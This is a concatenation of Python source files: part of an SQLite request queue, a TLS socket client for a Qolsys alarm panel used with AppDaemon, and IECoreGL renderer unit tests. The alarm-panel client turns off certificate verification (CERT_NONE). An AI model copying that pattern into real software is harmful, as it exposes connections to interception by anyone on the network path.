c.execute("DELETE FROM {} WHERE id IN (SELECT id FROM {} WHERE {}=? ORDER BY id LIMIT 1)".format(const.REQUEST_PARSE_TABLE, const.REQUEST_PARSE_TABLE, const.COLUMN_NAME_FINGERPRINT),
(fingerprint,))
def parse_failed(self, c, request: Request):
c.execute("INSERT OR IGNORE INTO {}({}, {}) VALUES (?, ?)".format(const.REQUEST_PARSE_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST), (request.fingerprint, pickle.dumps(request),))
|
qolsys_socket.py
|
import json
import socket
import ssl
import sys
import time
import asyncio
import threading
import appdaemon.plugins.mqtt.mqttapi as mqtt
#
# qolsys socket manager
#
# args
# yep
#
class qolsys:
################################################################################
# Code
def __init__(self, app):
        # Placeholders; the real socket, SSL wrapper, listener thread and callback are set up in create_socket()
        self._sock = None
        self._wrappedSocket = None
        self._listening_thread = None
        self._listener_callback = None
self._hostname = ""
self._port = 12345
self._token = ""
self._timeout = 60
self.app = app
self.__listening__ = True
# logging.basicConfig(filename='qolsys_socket.log', level=logging.DEBUG)
def create_socket(self, hostname, port, token, cb: callable, timeout=60):
self._hostname = hostname
self._port = port
self._token = token
self._listener_callback = cb
self._timeout = timeout
try:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(timeout)
#Set the listener callback at the instance level so we can restart the listener if needed
except socket.error:
self.app.log('Could not create a socket', level="ERROR")
raise
# Wrap SSL
self.app.log("wrapping socket")
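        # Note: ssl.wrap_socket() is deprecated (removed in Python 3.12); an SSLContext with
        # check_hostname disabled and CERT_NONE would be the modern equivalent, kept as-is here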
self._wrappedSocket = ssl.wrap_socket(self._sock, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1_2)
# Connect to server
try:
#The stupid Qolsys panel requires blocking
# wrappedSocket.setblocking(False)
self.app.log("connecting to socket", level="INFO")
self._wrappedSocket.connect((hostname, port))
self.app.log("Connected wrappedSocket: %s", self._wrappedSocket, level="INFO")
self.app.log("Starting listener thread", level="INFO")
self._start_listener()
self.app.log("started listener", level="INFO")
return True
except socket.error:
self.app.log("Error creating or connecting to socket %s", sys.exc_info(), level="ERROR")
return False
def _start_listener(self):
self.app.log("Starting listener thread", level="INFO")
self._listening_thread = threading.Thread(target=self.listen, args=([self._listener_callback]))
self._listening_thread.start()
self.app.log("started listener thread", level="INFO")
def _reset_socket(self):
self.close_socket()
#self._listening_thread = threading.Thread(target=self.listen, args=([self._listener_callback]))
self.app.log("Creating socket", level="INFO")
self.__listening__ = True
self.create_socket(self._hostname, self._port, self._token, self._listener_callback, self._timeout)
def close_socket(self, timeout=1):
        self.app.log("Detaching from wrapped socket", level="WARNING")
self.__listening__ = False
self._wrappedSocket.detach()
self.app.log("Closing socket", level="WARNING")
self._sock.close()
time.sleep(timeout)
def send_to_socket(self, message: json):
self._wrappedSocket.send(b'\n')
self._wrappedSocket.send((json.dumps(message)).encode())
return True
def listen(self, cb: callable):
#listening = True
self.app.log("starting listen", level="INFO")
data = ""
#err = ""
while not (self._wrappedSocket._connected):
self.app.log("not connected yet", level="WARNING")
self.app.log(self._wrappedSocket._connected, level="INFO")
time.sleep(1)
try:
while self._wrappedSocket._connected and self.__listening__:
data = self._wrappedSocket.recv(8192).decode()
if len(data) > 0:
self.app.log("data received from qolsys panel: %s len(data): %s", data, len(data), level="DEBUG")
if is_json(data):
try:
cb(data)
except:
self.app.log("Error calling callback: %s", cb, sys.exc_info(), level="ERROR")
else:
if data != 'ACK\n':
pass
self.app.log("non json data: %s", data, level="DEBUG")
else:
                    self.app.log("No data received. Bad token? Detaching.", level="ERROR")
self._wrappedSocket.detach()
raise NoDataError
self.app.log("stopped listening on qolsys socket", level="INFO")
except socket.timeout:
self.app.log("socket timeout", level="WARNING")
except NoDataError:
self._reset_socket()
raise NoDataError
except TimeoutError:
self.app.log("qolsys socket TimeoutError: %s", sys.exc_info(), level="ERROR")
            self._reset_socket()
raise NoDataError
except:
self.app.log("listen failed/stopped: %s", sys.exc_info(), level="ERROR")
def is_json(myjson):
try:
json_object = json.loads(myjson)
if json_object: return True
except:
#if myjson != 'ACK\n':
#self.app.log(("not json: %s", myjson), level="WARNING")
#self.app.log(("Error: %s", sys.exc_info()), level="ERROR")
return False
class NoDataError(Exception):
pass
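# Minimal usage sketch (illustrative only - the hostname, port, token and payload shape are
# placeholders, and `app` is assumed to be an AppDaemon app exposing log() and a JSON callback):
#
#   panel = qolsys(app)
#   if panel.create_socket("192.168.1.20", 12345, "SECRET_TOKEN", app.handle_panel_event):
#       panel.send_to_socket({"action": "INFO", "token": "SECRET_TOKEN"})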
|
Renderer.py
|
##########################################################################
#
# Copyright (c) 2007-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import unittest
import os
import os.path
import threading
import math
from IECore import *
import IECore
from IECoreGL import *
init( False )
class TestRenderer( unittest.TestCase ) :
def testOptions( self ) :
os.environ["IECOREGL_TEXTURE_PATHS"] = "textureDefault"
os.environ["IECOREGL_SHADER_PATHS"] = "shaderDefault"
r = Renderer()
self.assertEqual( r.typeName(), "IECoreGL::Renderer" )
self.assertEqual( r.getOption( "searchPath:texture" ), StringData( "textureDefault" ) )
self.assertEqual( r.getOption( "gl:searchPath:texture" ), StringData( "textureDefault" ) )
r.setOption( "searchPath:texture", StringData( "a" ) )
self.assertEqual( r.getOption( "searchPath:texture" ), StringData( "a" ) )
self.assertEqual( r.getOption( "gl:searchPath:texture" ), StringData( "a" ) )
r.setOption( "gl:searchPath:texture", StringData( "b" ) )
self.assertEqual( r.getOption( "searchPath:texture" ), StringData( "b" ) )
self.assertEqual( r.getOption( "gl:searchPath:texture" ), StringData( "b" ) )
self.assertEqual( r.getOption( "searchPath:shader" ), StringData( "shaderDefault" ) )
self.assertEqual( r.getOption( "gl:searchPath:shader" ), StringData( "shaderDefault" ) )
r.setOption( "searchPath:shader", StringData( "s" ) )
self.assertEqual( r.getOption( "searchPath:shader" ), StringData( "s" ) )
self.assertEqual( r.getOption( "gl:searchPath:shader" ), StringData( "s" ) )
r.setOption( "gl:searchPath:shader", StringData( "t" ) )
self.assertEqual( r.getOption( "searchPath:shader" ), StringData( "t" ) )
self.assertEqual( r.getOption( "gl:searchPath:shader" ), StringData( "t" ) )
self.assertEqual( r.getOption( "shutter" ), V2fData( V2f( 0 ) ) )
r.setOption( "shutter", V2fData( V2f( 1, 2 ) ) )
self.assertEqual( r.getOption( "shutter" ), V2fData( V2f( 1, 2 ) ) )
self.assertEqual( r.getOption( "gl:drawCoordinateSystems" ), BoolData( False ) )
r.setOption( "gl:drawCoordinateSystems", BoolData( True ) )
self.assertEqual( r.getOption( "gl:drawCoordinateSystems" ), BoolData( True ) )
def testAttributes( self ) :
deferred = Renderer()
deferred.setOption( "gl:mode", StringData( "deferred" ) )
immediate = Renderer()
immediate.setOption( "gl:mode", StringData( "immediate" ) )
for r in [ deferred, immediate ] :
r.worldBegin()
self.assertEqual( r.getAttribute( "color" ), Color3fData( Color3f( 1 ) ) )
self.assertEqual( r.getAttribute( "opacity" ), Color3fData( Color3f( 1 ) ) )
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 1 ) ) )
self.assertEqual( r.getAttribute( "gl:blend:color" ), Color4fData( Color4f( 1 ) ) )
self.assertEqual( r.getAttribute( "gl:blend:srcFactor" ), StringData( "srcAlpha" ) )
self.assertEqual( r.getAttribute( "gl:blend:dstFactor" ), StringData( "oneMinusSrcAlpha" ) )
self.assertEqual( r.getAttribute( "gl:blend:equation" ), StringData( "add" ) )
self.assertEqual( r.getAttribute( "gl:shade:transparent" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:primitive:sortForTransparency" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "name" ), StringData( "unnamed" ) )
self.assertEqual( r.getAttribute( "doubleSided" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:smoothing:points" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:smoothing:lines" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:smoothing:polygons" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:procedural:reentrant" ), BoolData( True ) )
if withFreeType() :
self.assertEqual( r.getAttribute( "gl:textPrimitive:type" ), StringData( "mesh" ) )
self.assertEqual( r.getAttribute( "gl:depthTest" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:depthMask" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:alphaTest" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:mode" ), StringData( "always" ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:value" ), FloatData( 0.0 ) )
self.assertEqual( r.getAttribute( "gl:visibility:camera" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:automaticInstancing" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "automaticInstancing" ), BoolData( True ) )
r.setAttribute( "color", Color3fData( Color3f( 0, 1, 2 ) ) )
self.assertEqual( r.getAttribute( "color" ), Color3fData( Color3f( 0, 1, 2 ) ) )
            # opacity is an odd one - it's set as a color, but because it's averaged internally
            # the result you get back is a greyscale value.
r.setAttribute( "opacity", Color3fData( Color3f( 3, 1, 2 ) ) )
self.assertEqual( r.getAttribute( "opacity" ), Color3fData( Color3f( 2 ) ) )
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 0, 1, 2, 2 ) ) )
r.setAttribute( "gl:color", Color4fData( Color4f( 1, 2, 3, 4 ) ) )
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 1, 2, 3, 4 ) ) )
r.setAttribute( "gl:blend:color", Color4fData( Color4f( 0, 1, 0, 1 ) ) )
self.assertEqual( r.getAttribute( "gl:blend:color" ), Color4fData( Color4f( 0, 1, 0, 1 ) ) )
r.attributeBegin()
r.setAttribute( "color", Color3fData( Color3f( 0 ) ) )
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 0, 0, 0, 4 ) ) )
r.attributeEnd()
self.assertEqual( r.getAttribute( "gl:color" ), Color4fData( Color4f( 1, 2, 3, 4 ) ) )
factors = [ "zero", "one", "srcColor", "oneMinusSrcColor", "dstColor", "oneMinusDstColor",
"srcAlpha", "oneMinusSrcAlpha", "dstAlpha", "oneMinusDstAlpha", "dstAlpha", "oneMinusDstAlpha",
"constantColor", "oneMinusConstantColor", "constantAlpha", "oneMinusConstantAlpha" ]
for f in factors :
last = r.getAttribute( "gl:blend:dstFactor" )
r.setAttribute( "gl:blend:srcFactor", StringData( f ) )
self.assertEqual( r.getAttribute( "gl:blend:srcFactor" ), StringData( f ) )
self.assertEqual( r.getAttribute( "gl:blend:dstFactor" ), last )
last = r.getAttribute( "gl:blend:srcFactor" )
r.setAttribute( "gl:blend:dstFactor", StringData( f ) )
self.assertEqual( r.getAttribute( "gl:blend:srcFactor" ), StringData( f ) )
self.assertEqual( r.getAttribute( "gl:blend:dstFactor" ), last )
for e in ["add", "subtract", "reverseSubtract", "min", "max"] :
r.setAttribute( "gl:blend:equation", StringData( e ) )
self.assertEqual( r.getAttribute( "gl:blend:equation" ), StringData( e ) )
r.setAttribute( "name", StringData( "sphere" ) )
self.assertEqual( r.getAttribute( "name" ), StringData( "sphere" ) )
r.setAttribute( "doubleSided", BoolData( False ) )
self.assertEqual( r.getAttribute( "doubleSided" ), BoolData( False ) )
r.setAttribute( "gl:smoothing:points", BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:smoothing:points" ), BoolData( True ) )
r.setAttribute( "gl:smoothing:lines", BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:smoothing:lines" ), BoolData( True ) )
r.setAttribute( "gl:smoothing:polygons", BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:smoothing:polygons" ), BoolData( True ) )
r.setAttribute( "gl:procedural:reentrant", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:procedural:reentrant" ), BoolData( False ) )
if withFreeType() :
r.setAttribute( "gl:textPrimitive:type", StringData( "sprite" ) )
self.assertEqual( r.getAttribute( "gl:textPrimitive:type" ), StringData( "sprite" ) )
r.setAttribute( "gl:depthTest", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:depthTest" ), BoolData( False ) )
r.setAttribute( "gl:depthMask", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:depthMask" ), BoolData( False ) )
r.setAttribute( "gl:alphaTest", BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:alphaTest" ), BoolData( True ) )
alphaTestModes = [ "never", "less", "equal", "lequal", "greater", "notequal", "gequal", "always" ]
value = 0.1
for m in alphaTestModes :
last = r.getAttribute( "gl:alphaTest:value" )
r.setAttribute( "gl:alphaTest:mode", StringData( m ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:mode" ), StringData( m ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:value" ), last )
last = r.getAttribute( "gl:alphaTest:mode" )
r.setAttribute( "gl:alphaTest:value", FloatData( value ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:value" ), FloatData( value ) )
self.assertEqual( r.getAttribute( "gl:alphaTest:mode" ), last )
value += 0.05
r.setAttribute( "gl:visibility:camera", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:visibility:camera" ), BoolData( False ) )
r.setAttribute( "gl:automaticInstancing", BoolData( False ) )
self.assertEqual( r.getAttribute( "gl:automaticInstancing" ), BoolData( False ) )
self.assertEqual( r.getAttribute( "automaticInstancing" ), BoolData( False ) )
r.setAttribute( "automaticInstancing", BoolData( True ) )
self.assertEqual( r.getAttribute( "automaticInstancing" ), BoolData( True ) )
self.assertEqual( r.getAttribute( "gl:automaticInstancing" ), BoolData( True ) )
r.worldEnd()
def testOtherRendererAttributes( self ) :
"""Attributes destined for other renderers should be silently ignored."""
deferred = Renderer()
deferred.setOption( "gl:mode", StringData( "deferred" ) )
immediate = Renderer()
immediate.setOption( "gl:mode", StringData( "immediate" ) )
with CapturingMessageHandler() as handler :
for r in [ deferred, immediate ] :
r.worldBegin()
r.setAttribute( "ri:visibility:diffuse", IntData( 0 ) )
r.worldEnd()
self.assertEqual( len( handler.messages ), 0 )
def testStackBug( self ) :
# This should produce a yellow sphere in between two red spheres. It does in the DeferredRenderer but
# currently fails in the ImmediateRenderer.
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.display( os.path.dirname( __file__ ) + "/output/testStackBug.tif", "tiff", "rgba", {} )
r.worldBegin()
r.shader( "surface", "rgbColor", { "red" : FloatData( 1 ), "green" : FloatData( 0 ), "blue" : FloatData( 0 ) } )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.attributeBegin()
r.shader( "surface", "rgbColor", { "red" : FloatData( 1 ), "green" : FloatData( 1 ), "blue" : FloatData( 0 ) } )
r.geometry( "sphere", {}, {} )
r.attributeEnd()
r.concatTransform( M44f.createTranslated( V3f( -1, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.concatTransform( M44f.createTranslated( V3f( 2, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.worldEnd()
i = Reader.create( os.path.dirname( __file__ ) + "/output/testStackBug.tif" ).read()
e = PrimitiveEvaluator.create( i )
result = e.createResult()
r = e.R()
g = e.G()
b = e.B()
e.pointAtUV( V2f( 0.5, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 1 )
self.assertEqual( result.floatPrimVar( g ), 1 )
self.assertEqual( result.floatPrimVar( b ), 0 )
e.pointAtUV( V2f( 0, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 1 )
self.assertEqual( result.floatPrimVar( g ), 0 )
self.assertEqual( result.floatPrimVar( b ), 0 )
e.pointAtUV( V2f( 1, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 1 )
self.assertEqual( result.floatPrimVar( g ), 0 )
self.assertEqual( result.floatPrimVar( b ), 0 )
def testPrimVars( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.display( os.path.dirname( __file__ ) + "/output/testPrimVars.tif", "tiff", "rgba", {} )
r.worldBegin()
r.shader( "surface", "rgbColor", {} )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.attributeBegin()
# should make red, green and blue spheres
r.geometry( "sphere", {}, {
"red" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 1 ) ),
"green" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
"blue" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
}
)
r.attributeEnd()
r.concatTransform( M44f.createTranslated( V3f( -1, 0, 0 ) ) )
r.geometry( "sphere", {}, {
"red" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
"green" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 1 ) ),
"blue" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
}
)
r.concatTransform( M44f.createTranslated( V3f( 2, 0, 0 ) ) )
r.geometry( "sphere", {}, {
"red" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
"green" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
"blue" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 1 ) ),
}
)
r.worldEnd()
i = Reader.create( os.path.dirname( __file__ ) + "/output/testPrimVars.tif" ).read()
e = PrimitiveEvaluator.create( i )
result = e.createResult()
r = e.R()
g = e.G()
b = e.B()
e.pointAtUV( V2f( 0, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 0 )
self.assertEqual( result.floatPrimVar( g ), 1 )
self.assertEqual( result.floatPrimVar( b ), 0 )
e.pointAtUV( V2f( 0.5, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 1 )
self.assertEqual( result.floatPrimVar( g ), 0 )
self.assertEqual( result.floatPrimVar( b ), 0 )
e.pointAtUV( V2f( 1, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 0 )
self.assertEqual( result.floatPrimVar( g ), 0 )
self.assertEqual( result.floatPrimVar( b ), 1 )
def testImagePrimitive( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.display( os.path.dirname( __file__ ) + "/output/testImage.exr", "exr", "rgba", {} )
r.camera(
"main",
{
"projection" : IECore.StringData( "orthographic" ),
"resolution" : IECore.V2iData( IECore.V2i( 1024 ) ),
"clippingPlanes" : IECore.V2fData( IECore.V2f( 1, 1000 ) ),
"screenWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
}
)
i = Reader.create( os.path.dirname( __file__ ) + "/images/numbers.exr" ).read()
with IECore.WorldBlock( r ) :
# the shader should be ignored.
r.shader( "surface", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.concatTransform( M44f.createScaled( V3f( 2. / i.bound().size().x ) ) )
i.render( r )
i2 = Reader.create( os.path.dirname( __file__ ) + "/output/testImage.exr" ).read()
self.assertEqual( ImageDiffOp()( imageA = i, imageB = i2, maxError = 0.05 ).value, False )
## \todo Make this assert something
def testAlphaBlending( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.worldBegin()
r.setAttribute( "gl:blend:srcFactor", StringData( "one" ) )
r.setAttribute( "gl:blend:dstFactor", StringData( "one" ) )
r.setAttribute( "gl:blend:equation", StringData( "add" ) )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.concatTransform( M44f.createScaled( V3f( 0.004 ) ) )
r.concatTransform( M44f.createTranslated( V3f( -150, -200, 0 ) ) )
i = Reader.create( os.path.dirname( __file__ ) + "/images/numberWithAlpha.exr" ).read()
i.render( r )
r.concatTransform( M44f.createTranslated( V3f( 300, 300, 1 ) ) )
i.render( r )
r.worldEnd()
def testProcedural( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.display( os.path.dirname( __file__ ) + "/output/proceduralTest.tif", "tiff", "rgba", {} )
r.worldBegin()
r.shader( "surface", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.concatTransform( M44f.createScaled( V3f( 0.1 ) ) )
p = ReadProcedural()
p["files"]["name"].setValue( StringData( "test/IECore/data/cobFiles/pSphereShape1.cob" ) )
p.render( r )
r.worldEnd()
expectedImage = Reader.create( os.path.dirname( __file__ ) + "/expectedOutput/proceduralTest.tif" )()
actualImage = Reader.create( os.path.dirname( __file__ ) + "/output/proceduralTest.tif" )()
self.assertEqual( ImageDiffOp()( imageA = expectedImage, imageB = actualImage, maxError = 0.05 ).value, False )
## \todo Make this assert something
def testShader( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
r.worldBegin()
r.shader( "surface", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.geometry( "sphere", {}, {} )
r.worldEnd()
s = r.scene()
s.render( State( True ) )
def __countChildrenRecursive( self, g ) :
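        """Counts the non-Group leaves of the scene graph rooted at g."""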
if not isinstance( g, Group ):
return 1
count = 0
for c in g.children():
count += self.__countChildrenRecursive( c )
return count
def testEdits( self ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
r.worldEnd()
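        # attribute edits made after worldEnd() without an editBegin/editEnd block are expected
        # to produce a warning per call below; inside an edit block they should produce none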
with CapturingMessageHandler() as handler :
r.attributeBegin()
r.setAttribute( "gl:color", Color4fData( Color4f( 1, 2, 3, 4 ) ) )
r.attributeEnd()
self.assertEqual( len( handler.messages ), 3 )
with CapturingMessageHandler() as handler :
r.command( "editBegin", {} )
r.attributeBegin()
r.setAttribute( "gl:color", Color4fData( Color4f( 1, 2, 3, 4 ) ) )
r.attributeEnd()
r.command( "editEnd", {} )
self.assertEqual( len( handler.messages ), 0 )
def testRemoveObject( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
with WorldBlock( r ) :
r.setAttribute( "name", "sphereOne" )
r.sphere( 1, -1, 1, 360, {} )
r.setAttribute( "name", "sphereTwo" )
r.sphere( 1, -1, 1, 360, {} )
with AttributeBlock( r ) :
r.sphere( 1, -1, 1, 360, {} )
r.setAttribute( "name", "sphereOne" )
r.sphere( 1, -1, 1, 360, {} )
r.sphere( 1, -1, 1, 360, {} )
r.sphere( 1, -1, 1, 360, {} )
s = r.scene()
self.assertEqual( len( s.root().children() ), 3 )
# check that trying to remove objects when not in an editBegin/editEnd block
# fails and prints a message
errorCatcher = CapturingMessageHandler()
with errorCatcher :
commandResult = r.command( "removeObject", { "name" : StringData( "sphereOne" ) } )
self.assertEqual( commandResult, None )
self.assertEqual( len( errorCatcher.messages ), 1 )
# check we can remove one object without affecting the other
r.command( "editBegin", {} )
commandResult = r.command( "removeObject", { "name" : StringData( "sphereOne" ) } )
r.command( "editEnd", {} )
self.assertEqual( commandResult, BoolData( True ) )
self.assertEqual( len( s.root().children() ), 2 )
self.assertEqual( self.__countChildrenRecursive( s.root() ), 2 )
        # now we test that both the sphere and the following attribute block ( instantiated as a Group ) are removed
r.command( "editBegin", {} )
commandResult = r.command( "removeObject", { "name" : StringData( "sphereTwo" ) } )
r.command( "editEnd", {} )
self.assertEqual( commandResult, BoolData( True ) )
self.assertEqual( len( s.root().children() ), 0 )
def testEditQuery( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
with WorldBlock( r ) :
self.assertEqual( r.command( "editQuery", {} ), IECore.BoolData( False ) )
self.assertEqual( r.command( "editQuery", {} ), IECore.BoolData( False ) )
r.command( "editBegin", {} )
self.assertEqual( r.command( "editQuery", {} ), IECore.BoolData( True ) )
r.command( "editEnd", {} )
self.assertEqual( r.command( "editQuery", {} ), IECore.BoolData( False ) )
def testRemoveObjectDuringProcedural( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
with WorldBlock( r ) :
r.setAttribute( "name", "sphereOne" )
r.sphere( 1, -1, 1, 360, {} )
r.setAttribute( "name", "sphereTwo" )
r.sphere( 1, -1, 1, 360, {} )
s = r.scene()
self.assertEqual( len( s.root().children() ), 2 )
class RemovalProcedural( Renderer.Procedural ):
def __init__( proc ):
Renderer.Procedural.__init__( proc )
def bound( proc ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def render( proc, renderer ):
commandResult = renderer.command( "removeObject", { "name" : StringData( "sphereOne" ) } )
self.assertEqual( commandResult, BoolData( True ) )
def hash( self ):
h = IECore.MurmurHash()
return h
r.command( "editBegin", {} )
r.procedural( RemovalProcedural() )
r.command( "editEnd", {} )
self.assertEqual( len( s.root().children() ), 1 )
self.assertEqual( self.__countChildrenRecursive( r.scene().root() ), 1 )
def testRemoveObjectWithResourcesDuringProcedural( self ) :
r = Renderer()
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:mode", StringData( "deferred" ) )
with WorldBlock( r ) :
with AttributeBlock( r ) :
r.setAttribute( "name", "sphereOne" )
r.shader( "surface", "image", {
"texture" : IECore.SplinefColor3fData(
IECore.SplinefColor3f(
IECore.CubicBasisf.catmullRom(),
(
( 0, IECore.Color3f( 1 ) ),
( 0, IECore.Color3f( 1 ) ),
( 1, IECore.Color3f( 0 ) ),
( 1, IECore.Color3f( 0 ) ),
),
),
),
} )
r.sphere( 1, -1, 1, 360, {} )
s = r.scene()
self.assertEqual( len( s.root().children()[0].children() ), 1 )
s.render()
class RemovalProcedural( Renderer.Procedural ):
def __init__( proc, level=0 ) :
Renderer.Procedural.__init__( proc )
def bound( proc ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def render( proc, renderer ):
commandResult = renderer.command( "removeObject", { "name" : StringData( "sphereOne" ) } )
self.assertEqual( commandResult, BoolData( True ) )
def hash( self ):
h = IECore.MurmurHash()
return h
r.command( "editBegin", {} )
# typically you wouldn't call a renderer method on a separate thread like this. we're just
# doing it here to force the procedural onto a different thread. if left to its own devices
# the renderer will run procedurals on different threads, but it equally well might call
# them on the main thread. we force the procedural onto a separate thread so we can reliably
# exercise a problem we're trying to address.
t = threading.Thread( target=IECore.curry( r.procedural, RemovalProcedural() ) )
t.start()
t.join()
# if an edit session removes objects which use gl resources (shaders, textures etc),
# then it's essential that the editEnd call occurs on the thread with the correct gl context.
# this is so the gl resources can be deleted in the correct context.
r.command( "editEnd", {} )
self.assertEqual( len( s.root().children() ), 0 )
def testParallelRenders( self ):
allScenes = []
def threadedRendering():
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
r.worldBegin()
r.shader( "surface", "failWithoutPreprocessing", {} )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.worldEnd()
allScenes.append( r.scene() )
for i in xrange( 0, 100 ):
newThread = threading.Thread(target=threadedRendering)
newThread.start()
while len(allScenes) < 100 :
pass
for s in allScenes :
s.render( State( True ) )
